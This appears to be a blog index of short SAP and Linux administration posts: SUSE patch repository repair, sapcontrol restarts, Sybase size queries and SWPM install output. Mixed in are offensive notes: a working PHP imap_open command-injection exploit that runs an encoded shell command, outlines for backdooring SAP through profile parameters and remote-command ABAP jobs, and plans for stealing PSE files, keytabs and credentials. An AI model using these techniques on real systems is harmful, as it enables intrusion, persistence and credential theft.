Posts

SuSE Update Lists No Repository

We need to perform OS patching for ORAC, but found a SUSE connect error and no repositories defined. No updates can be found currently.


ls -l /etc/products.d
The wrong baseproduct is defined; it should be SLES_SAP.prod
cd /etc/products.d
unlink baseproduct
ln -s SLES_SAP.prod baseproduct
cat /var/log/cloudregister
zypper repos
zypper lp --category security
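
An idempotent version of the symlink check and repair above, as an added example that is not part of the original post. The function names are assumptions; the repair refuses to repoint the link when the expected .prod file is not installed, so a typo cannot leave the host with a dangling baseproduct and no update repositories.

```shell
#!/bin/sh
# Added example: audit and, if needed, repair the baseproduct symlink.
# Function names are assumptions made for this sketch.
# Usage on the host (as root): fix_baseproduct /etc/products.d SLES_SAP.prod

# Print the .prod file name the baseproduct symlink points to.
baseproduct_target() {
    dir=$1
    [ -L "$dir/baseproduct" ] || return 1
    basename "$(readlink "$dir/baseproduct")"
}

# 0 = already correct, 1 = points elsewhere, 2 = symlink missing,
# 3 = expected .prod file is not installed in the directory.
check_baseproduct() {
    dir=$1 expected=$2
    [ -f "$dir/$expected" ] || return 3
    current=$(baseproduct_target "$dir") || return 2
    [ "$current" = "$expected" ]
}

# Repoint the symlink only when the check says it is wrong or missing.
fix_baseproduct() {
    dir=$1 expected=$2
    rc=0
    check_baseproduct "$dir" "$expected" || rc=$?
    case $rc in
        0) echo "baseproduct already -> $expected"; return 0 ;;
        3) echo "missing $dir/$expected, nothing changed" >&2; return 3 ;;
    esac
    # Relative link, same as the manual unlink + ln -s steps.
    ( cd "$dir" && ln -sfn "$expected" baseproduct ) || return 1
    echo "baseproduct now -> $(baseproduct_target "$dir")"
}
```

After a successful repair, `zypper repos` and `zypper lp --category security` confirm that the repositories and security patches are visible again.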
Kudos to Stijn De Regge
//alak



Restart an SAP service internally in SAP without restarting the service itself

If we restart the whole instance, users get disconnected, etc. So if, for example, we want to restart only the message server, we can either use MMC and All Task > Restart Service for MessageServer, or more simply use the command:

sapcontrol -nr 61 -function RestartService
and to check:

sapcontrol -nr 61 -function GetProcessList
Kudos to Stijn De Regge and Tibor Fenyosi for the guide! :3

/alak

SYBASE ASE - Neatly Display DB/Schema Sizes

When running isql, it should have "-w999":

isql -Usapsa -S -P -X -w999

After that, here are the commands:

use master
go
declare @pagesize numeric(19,0)
select @pagesize=(select @@maxpagesize)
SELECT "DB Name" = CONVERT(char(15), db_name(D.dbid)),
"DB Size MB" = STR(SUM(CASE WHEN U.segmap != 4 THEN U.size*@pagesize/1048576 END),10,1),
"Used Data MB" = STR(SUM(CASE WHEN U.segmap != 4 THEN size - curunreservedpgs(U.dbid, U.lstart, U.unreservedpgs)END)*@pagesize/1048576,10,1),
"Data Full%" = STR(100 * (1 - 1.0 * SUM(CASE WHEN U.segmap != 4 THEN curunreservedpgs(U.dbid, U.lstart, U.unreservedpgs) END)/SUM(CASE WHEN U.segmap != 4 THEN U.size END)),9,1),
"Log Size MB" = STR(SUM(CASE WHEN U.segmap = 4 THEN U.size*@pagesize/1048576 END),10,1),
"Free Log MB" = STR(lct_admin("logsegment_freepages",D.dbid)*@pagesize/1048576,10,1),
"Log Full%" = STR(100 * (1 - 1.0 * lct_admin("logsegment_fr…

SAP Backdoors [Placeholder Post]

This is a placeholder for a future post on backdooring SAP servers:

1. SAP profile SETENV_xx parameter
- if get local access, or SAP level access can cat or echo a line into profile parameter file
- concatenated command for SETENV_+xx param

2. Using ABAP program + SM37
- ABAP program to fetch command from a remote server (HTTP-GET ABAP Function Module)
- schedule job every 2 minutes interval
- for that job, set spool recipient to remote attacker email so output can be sent over
- Pre-req: SCOT configuration, Auth for SM36, SE38

to be continued..

//alak

Bypassing PHP’s Disabled exec()

Source: https://github.com/Bo0oM/PHP_imap_open_exploit
<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());
?>

SAP Post-Exploitation - One script to 0wn 'em All

The topic here is this: post-exploitation for SAP systems, not at the application level but at the OS level.

Imagine a red-teamer gained access to a <sid>adm user ID, having SSH or RDP access. What's next? Well, there's a lot he/she can do. <sid>adm has the rights to query the DB directly. <sid>adm can access the userkeystore. <sid>adm typically has the rights to read PSE files and keytabs. <sid>adm typically can access /sapmnt/trans of other SIDs within the landscape. <sid>adm can also access profiles, DEFAULT.PFL, etc., and insert a command line backdoor that will restart each time the application starts.
Watch this space. Am developing that script. :)

=============================
SECTION 1: The Possible Probe Points
=============================

- Get the SID via /etc/passwd or net users or service query or current user
- Identify possible PSE file location
- Identify any possible cert dumps to get p12 format
- Identify DB and kernel version
- Identify connectivity and userstore - R3trans or sqlplus or hdbsql or sqlcmd etc.

SAP SWPM Software Provision Manager SL Toolset 1.0 SP22 Startup Options

This is just a rough note on the options and properties we can set when running sapinst to install an SAP system.

Version:

[root@host SWPM]# ./sapinst -v
[==============================] - extracting...  done!
INFO       2018-04-19 11:54:56.315 (mainThread) [sixxcreate.cpp:346]
********************************************************************************
Initial log directory: /root/.sapinst/falconheavy.vantage-intl.com/12345
********************************************************************************


SAPinst build information:
--------------------------
Version:         749.0.47
Build:           1832063
Compile time:    Mar 27 2018 - 13:22:27
Make type:       optU
Codeline:        749_REL
Platform:        linuxx86_64
Kernel build:    749, patch 426, changelist 1830485
SAP JRE build:   SAP Java Server VM (build 8.1.037 9.0.4+011, Feb 27 2018 15:45:47 - 81_REL - optU - linux amd64 - 6 - bas2:302122 (mixed mode))
SAP JCo build:   3.0.17
SL-UI version:   2.6.21
SAP UI5 version: 1.50.4
[root@host S…